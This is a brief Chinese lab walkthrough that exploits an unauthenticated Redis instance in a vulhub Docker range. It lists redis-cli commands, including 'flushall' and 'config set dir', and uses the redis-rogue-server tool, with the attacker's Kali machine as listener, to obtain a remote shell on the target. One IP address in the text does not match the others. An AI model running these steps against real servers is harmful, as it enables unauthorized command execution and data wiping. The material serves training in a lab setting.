Redis未授权访问漏洞
靶场IP:192.168.30.138
kali的IP:192.168.30.129
搭建靶场环境
进入目录:cd/vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps
vi docker-compose.yml //查看端口和版本号
开启成功
安装redis工具
在kali上安装redis进行服务链接
#安装redis
apt-get install redis#redis使用
redis-cli -h 192.168.30.137 -p 6379#redis常见命令(1)查看信息:info(2)删除所有数据库内容:flushall(3)刷新数据库:flushdb(3)(4)看所有键:KEYS *,使用select num可以查看键值数据:(5)设置变量:set test"whoami"(6)config set dir dirpath 设置路径等配置(7)config get dir/dbfilename 获取路径及数据配置信息(8)save保存(9)get 变量,查看变量名称
步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目…
https://github.com/n0b0dyCN/redis-rogue-server
可以下载git源码或者压缩包
git clone https://github.com/n0b0dyCN/redis-rogue-server.git
步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境
python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129
然后就可以输入命令获取信息了